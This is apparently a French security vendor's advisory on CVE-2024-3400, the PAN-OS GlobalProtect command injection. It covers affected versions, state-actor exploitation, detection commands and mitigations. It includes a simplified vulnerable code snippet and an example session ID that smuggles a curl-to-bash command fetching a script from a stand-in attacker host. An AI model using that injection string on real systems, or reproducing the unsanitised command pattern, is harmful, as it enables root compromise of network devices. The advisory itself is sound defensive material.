剣 KENSAI
Critique CVE-2024-3400 Janvier 2026 · 9 min de lecture

CVE-2024-3400 : Injection de commandes dans Palo Alto PAN-OS — CVSS 10.0

CVE-2024-3400 est une vulnérabilité d'injection de commandes du système d'exploitation de gravité maximale dans la passerelle GlobalProtect de Palo Alto Networks PAN-OS. Un attaquant non authentifié peut exécuter des commandes OS arbitraires en tant que root sans aucune interaction requise. Exploitée par UTA0218 (probablement d'origine étatique) avant divulgation.


10.0
CRITIQUE (MAX)
AttributValeur
ID CVECVE-2024-3400
Vecteur CVSSAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-77 : Injection de commande OS
Publié le12 avril 2024
ExploitationActive — CISA KEV, exploitation par un acteur étatique

Qu'est-ce que CVE-2024-3400 ?

CVE-2024-3400 affecte la fonctionnalité GlobalProtect de Palo Alto Networks PAN-OS. Lorsque GlobalProtect est configuré en tant que passerelle ou portail, un attaquant distant non authentifié peut injecter des commandes OS arbitraires qui s'exécutent avec les privilèges root sur le pare-feu.

La combinaison de ces facteurs — aucune authentification requise, accessible depuis le réseau, changement de périmètre, impact maximal sur la confidentialité, l'intégrité et la disponibilité — donne un score CVSS parfait de 10.0. Parmi les fournisseurs de pare-feu, seule une poignée de vulnérabilités ont déjà reçu ce score.

🚨 Exploitation par un acteur étatique avant la disponibilité du correctif

Volexity a découvert cette vulnérabilité en répondant à un incident où UTA0218, un acteur de menace sophistiqué, avait déployé une nouvelle porte dérobée Python appelée UPSTYLE sur des appareils PAN-OS compromis. L'attaquant a utilisé le pare-feu comme point de pivot pour accéder aux réseaux internes, voler des identifiants Active Directory et exfiltrer des données sensibles. Volexity estime que l'exploitation a débuté fin mars 2024 — des semaines avant que Palo Alto ne soit notifié.

Systèmes concernés

Version de PAN-OSConcerné (GlobalProtect activé)Version corrigée
PAN-OS 11.1< 11.1.2-h311.1.2-h3+
PAN-OS 11.0< 11.0.4-h111.0.4-h1+
PAN-OS 10.2< 10.2.9-h110.2.9-h1+
PAN-OS 10.1< 10.1.14-h410.1.14-h4+

Prérequis : une passerelle ou un portail GlobalProtect doit être configuré (show global-protect-gateway current-user renvoie des résultats). Les organisations n'ayant pas configuré GlobalProtect ne sont pas concernées.

Analyse technique

Le point d'injection se trouve dans le code de gestion des sessions GlobalProtect. Lorsqu'une session GlobalProtect est établie, certains attributs de session sont écrits dans des fichiers temporaires sur le pare-feu. Le code qui construit le chemin de fichier de ces fichiers de session ne nettoie pas correctement l'identifiant de session, qui est partiellement contrôlé par l'attaquant.

# Simplified vulnerable file path construction
SESSION_ID = request.cookie["SESSID"]  # Attacker-controlled
session_file = f"/var/appweb/sslvpndocs/global-protect/{SESSION_ID}.log"
os.system(f"echo 'connected' >>  {session_file}")  # Injection de commande ici

# L'attaquant élabore un ID de session contenant des métacaractères shell :
# SESSION_ID = "../../tmp/evil;curl http://attacker.com/shell.sh|bash;"

La porte dérobée UPSTYLE installée par UTA0218 utilisait un nouveau mécanisme de persistance : un script Python qui surveillait les journaux d'accès du serveur web à la recherche de motifs de requête spécifiques (contenant une commande chiffrée), exécutait les commandes, puis restaurait le contenu original du fichier pour effacer les traces de l'activité.

Activité post-exploitation (UTA0218)

Volexity a documenté la séquence post-exploitation suivante menée par des acteurs étatiques :

Détection

Analyse des journaux PAN-OS

# Check for UPSTYLE backdoor artifacts
find / -name "*.py" -newer /etc/passwd -not -path "*/site-packages/*" 2>/dev/null

# Trafic suspect dans les journaux GlobalProtect
grep -i "curl\|wget\|python\|bash" /var/log/pan/sslvpn.log

# Fichiers système modifiés (UPSTYLE les modifie puis les restaure)
# Vérifier les horodatages d'accès récents sur les fichiers du serveur web
find /var/appweb -atime -7 -name "*.php" -o -name "*.py"

Requêtes de threat hunting

Atténuation

  1. Corriger immédiatement : appliquez les versions correctives listées ci-dessus. Il s'agit d'un CVSS 10.0 activement exploité — aucun délai n'est acceptable.
  2. Contournement provisoire via Threat Prevention : pour les appareils non corrigés, activez Threat Prevention avec des profils de sécurité sur les interfaces GlobalProtect. Palo Alto a fourni des signatures d'ID de menace spécifiques.
  3. Désactiver GlobalProtect si inutile : les organisations n'utilisant pas activement GlobalProtect peuvent désactiver temporairement la fonctionnalité en guise de contournement.
  4. Auditer les fichiers du pare-feu : exécutez le script fourni par Palo Alto pour rechercher UPSTYLE et d'autres artefacts post-exploitation.
  5. Faire pivoter tous les identifiants : tout identifiant stocké dans la configuration du pare-feu (certificats VPN, identifiants de liaison LDAP, etc.) doit être considéré comme compromis.

💡 Directive d'urgence de la CISA : la CISA a publié la directive d'urgence 24-03 exigeant que toutes les agences fédérales américaines appliquent les correctifs ou mesures d'atténuation avant le 19 avril 2024. Cette urgence reflète la gravité et l'exploitation active par des acteurs de menace sophistiqués.

Capacité de détection KENSAI

Votre infrastructure Palo Alto est-elle exposée à CVE-2024-3400 ?

KENSAI identifie instantanément les appareils PAN-OS exposés à Internet vulnérables à l'injection de commandes. N'attendez pas que des acteurs de menace les trouvent en premier.

Analysez votre périmètre maintenant →

Articles connexes

Industrialisation des malwares assistée par IA : Transparent Redirection... KENSAI vs SonarQube : pour 2025...